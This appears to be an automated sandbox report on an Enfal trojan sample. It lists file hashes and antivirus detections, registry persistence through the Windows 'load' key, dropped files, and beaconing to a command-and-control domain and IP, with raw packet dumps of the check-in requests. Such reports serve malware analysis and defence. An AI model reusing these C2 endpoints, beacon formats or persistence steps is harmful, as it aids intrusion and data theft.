Analysis Date2015-07-25 09:48:38
MD55fa0df3622e559011eb3a982df950dfa
SHA18859f68922829f26941493c36aa18a3c564d541d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: ebaffbcce6700e602c330afb8a10b305 sha1: 48b25b6594aa47655202802d96f6a258f298e9ad size: 40960
Section.rdata md5: b3039154963e572fc5d4c99b6131eeb3 sha1: 996cfad3ca45d5184152d9db15469c84e62037f4 size: 4096
Section.data md5: 11f3befade243fdbe77595e8f89f89a7 sha1: 925429690c22fd1c312a14c085e798b6e9170599 size: 8192
Section.vmp0 md5: 7c0903ac595041cc6ca90d4e4c7db6b9 sha1: ad7c590c4b86cde66eb678e16b08c358a10bcee2 size: 303104
Section.vmp1 md5: b79414ab2e22f43180fbe4d022a0d764 sha1: 328ae4bc6786740f861f36a264e3538f11feaa0e size: 4096
Timestamp2005-03-17 12:52:20
PackerInstaller VISE Custom
PEhash84695dc32104ededd6274c36e681514d649172bb
IMPhashc13616839e3f125f25bbcdf06e9d450c
AVRisingno_virus
AVMcafeeEnfal
AVAvira (antivir)TR/Enfal.A.1
AVTwisterTrojan.E7C49A00CB204E0F
AVAd-AwareGen:Variant.Symmi.42055
AVAlwil (avast)Samsa-I [Trj]
AVEset (nod32)Win32/Spy.Agent.NFG
AVGrisoft (avg)PSW.Agent.7.Q
AVSymantecDownloader
AVFortinetEnfal!tr
AVBitDefenderGen:Variant.Symmi.42055
AVK7Backdoor ( 04c4c34c1 )
AVMicrosoft Security EssentialsTrojan:Win32/Enfal.F
AVMicroWorld (escan)Gen:Variant.Symmi.42055
AVMalwareBytesno_virus
AVAuthentiumW32/Trojan.CHVJ-6708
AVFrisk (f-prot)W32/Trojan2.CJCV
AVIkarusTrojan-Spy.Win32.Agent.M
AVEmsisoftGen:Variant.Symmi.42055
AVZillya!Trojan.Win32.4932D2F0
AVKasperskyTrojan-Spy.Win32.Agent.bjr
AVTrend Microno_virus
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVPadvishMalware.Trojan.Spy-27259
AVBullGuardGen:Variant.Symmi.42055
AVArcabit (arcavir)Gen:Variant.Symmi.42055
AVClamAVTrojan.Spy-27259
AVDr. WebTrojan.PWS.Spy.8422
AVF-SecureGen:Variant.Symmi.42055
AVCA (E-Trust Ino)Win32/Etilqci.B

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File\Device\Netbios
Creates MutexMAIN
Creates MutexCMD

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load ➝
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\korwbrkr1.exe
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\7d13_appcompat.txt
Creates FileC:\WINDOWS\system32\korwbrkr1.exe
Creates FileC:\WINDOWS\system32\msvcrt80.dll
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 320 -e 1564 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 1580
Creates MutexCMD
Winsock URLhttp://bsek5.ggsddup.com/httpdocs/Accred
Winsock URLhttp://bsek5.ggsddup.com/httpdocs/wblt
Winsock URLhttp://bsek5.ggsddup.com/httpdocs/mm/COMPUTER-XXXXXX:00-00-00-00-00-00/Tiblue

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 1580

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 320 -e 1564 -g

Network Details:

DNSbsek5.ggsddup.com
Type: A
66.228.63.51
HTTP POSThttp://bsek5.ggsddup.com/cgi-bin/Owpq4.cgi
User-Agent:
HTTP POSThttp://bsek5.ggsddup.com/cgi-bin/Fupq9.cgi
User-Agent:
HTTP GEThttp://bsek5.ggsddup.com/httpdocs/mm/COMPUTER-XXXXXX:00-00-00-00-00-00/Tiblue
User-Agent:
HTTP GEThttp://bsek5.ggsddup.com/httpdocs/Accred
User-Agent:
HTTP GEThttp://bsek5.ggsddup.com/httpdocs/wblt
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 66.228.63.51:80
Flows TCP192.168.1.1:1032 ➝ 66.228.63.51:80
Flows TCP192.168.1.1:1033 ➝ 66.228.63.51:80
Flows TCP192.168.1.1:1034 ➝ 66.228.63.51:80
Flows TCP192.168.1.1:1035 ➝ 66.228.63.51:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f4675   POST /cgi-bin/Fu
0x00000010 (00016)   7071392e 63676920 48545450 2f312e31   pq9.cgi HTTP/1.1
0x00000020 (00032)   0d0a486f 73743a20 6273656b 352e6767   ..Host: bsek5.gg
0x00000030 (00048)   73646475 702e636f 6d0d0a43 6f6e7465   sddup.com..Conte
0x00000040 (00064)   6e742d4c 656e6774 683a2030 0d0a4361   nt-Length: 0..Ca
0x00000050 (00080)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000060 (00096)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f4f77   POST /cgi-bin/Ow
0x00000010 (00016)   7071342e 63676920 48545450 2f312e31   pq4.cgi HTTP/1.1
0x00000020 (00032)   0d0a486f 73743a20 6273656b 352e6767   ..Host: bsek5.gg
0x00000030 (00048)   73646475 702e636f 6d0d0a43 6f6e7465   sddup.com..Conte
0x00000040 (00064)   6e742d4c 656e6774 683a2031 34390d0a   nt-Length: 149..
0x00000050 (00080)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000060 (00096)   6f2d6361 6368650d 0a0d0a43 4f4d5055   o-cache....COMPU
0x00000070 (00112)   5445522d 58585858 58583a30 302d3030   TER-XXXXXX:00-00
0x00000080 (00128)   2d30302d 30302d30 302d3030 2f74756b   -00-00-00-00/tuk
0x00000090 (00144)   746b746b 77484f32 2c2b212a 3236653d   tktkwHO2,+!*26e=
0x000000a0 (00160)   35484f74 7770777f 7571757c 484f067f   5HOtwpw.uqu|HO..
0x000000b0 (00176)   19120c0b 010a1216 19363c36 31202876   .........6<61 (v
0x000000c0 (00192)   77192e2a 37322737 2e37746b 203d2048   w..*72'7.7tk = H
0x000000d0 (00208)   4f067f19 120c0b01 0a121619 363c3631   O...........6<61
0x000000e0 (00224)   20287677 19283633 2637317d 756b2129    (vw.(63&71}uk!)
0x000000f0 (00240)   29484f2b 484f2b48 4f2b484f 776b7470   )HO+HO+HO+HOwktp
0x00000100 (00256)                                         

0x00000000 (00000)   47455420 2f687474 70646f63 732f6d6d   GET /httpdocs/mm
0x00000010 (00016)   2f434f4d 50555445 522d5858 58585858   /COMPUTER-XXXXXX
0x00000020 (00032)   3a30302d 30302d30 302d3030 2d30302d   :00-00-00-00-00-
0x00000030 (00048)   30302f54 69626c75 65204854 54502f31   00/Tiblue HTTP/1
0x00000040 (00064)   2e310d0a 486f7374 3a206273 656b352e   .1..Host: bsek5.
0x00000050 (00080)   67677364 6475702e 636f6d0d 0a436163   ggsddup.com..Cac
0x00000060 (00096)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000070 (00112)   61636865 0d0a0d0a 31443a30 302d3030   ache....1D:00-00
0x00000080 (00128)   2d30302d 30302d30 302d3030 2f74756b   -00-00-00-00/tuk
0x00000090 (00144)   746b746b 77484f32 2c2b212a 3236653d   tktkwHO2,+!*26e=
0x000000a0 (00160)   35484f74 7770777f 7571757c 484f067f   5HOtwpw.uqu|HO..
0x000000b0 (00176)   19120c0b 010a1216 19363c36 31202876   .........6<61 (v
0x000000c0 (00192)   77192e2a 37322737 2e37746b 203d2048   w..*72'7.7tk = H
0x000000d0 (00208)   4f067f19 120c0b01 0a121619 363c3631   O...........6<61
0x000000e0 (00224)   20287677 19283633 2637317d 756b2129    (vw.(63&71}uk!)
0x000000f0 (00240)   29484f2b 484f2b48 4f2b484f 776b7470   )HO+HO+HO+HOwktp
0x00000100 (00256)                                         

0x00000000 (00000)   47455420 2f687474 70646f63 732f4163   GET /httpdocs/Ac
0x00000010 (00016)   63726564 20485454 502f312e 310d0a48   cred HTTP/1.1..H
0x00000020 (00032)   6f73743a 20627365 6b352e67 67736464   ost: bsek5.ggsdd
0x00000030 (00048)   75702e63 6f6d0d0a 43616368 652d436f   up.com..Cache-Co
0x00000040 (00064)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000050 (00080)   0a0d0a68 652d436f 6e74726f 6c3a206e   ...he-Control: n
0x00000060 (00096)   6f2d6361 6368650d 0a0d0a43 4f4d5055   o-cache....COMPU
0x00000070 (00112)   5445522d 58585858 58583a30 302d3030   TER-XXXXXX:00-00
0x00000080 (00128)   2d30302d 30302d30 302d3030 2f74756b   -00-00-00-00/tuk
0x00000090 (00144)   746b746b 77484f32 2c2b212a 3236653d   tktkwHO2,+!*26e=
0x000000a0 (00160)   35484f74 7770777f 7571757c 484f067f   5HOtwpw.uqu|HO..
0x000000b0 (00176)   19120c0b 010a1216 19363c36 31202876   .........6<61 (v
0x000000c0 (00192)   77192e2a 37322737 2e37746b 203d2048   w..*72'7.7tk = H
0x000000d0 (00208)   4f067f19 120c0b01 0a121619 363c3631   O...........6<61
0x000000e0 (00224)   20287677 19283633 2637317d 756b2129    (vw.(63&71}uk!)
0x000000f0 (00240)   29484f2b 484f2b48 4f2b484f 776b7470   )HO+HO+HO+HOwktp
0x00000100 (00256)   2011                                   .

0x00000000 (00000)   47455420 2f687474 70646f63 732f7762   GET /httpdocs/wb
0x00000010 (00016)   6c742048 5454502f 312e310d 0a486f73   lt HTTP/1.1..Hos
0x00000020 (00032)   743a2062 73656b35 2e676773 64647570   t: bsek5.ggsddup
0x00000030 (00048)   2e636f6d 0d0a4361 6368652d 436f6e74   .com..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000050 (00080)   0a653a20 74657874 2f68746d 6c0d0a44   .e: text/html..D
0x00000060 (00096)   6174653a 20536174 2c203235 204a756c   ate: Sat, 25 Jul
0x00000070 (00112)   20323031 35203038 3a35393a 32322047    2015 08:59:22 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings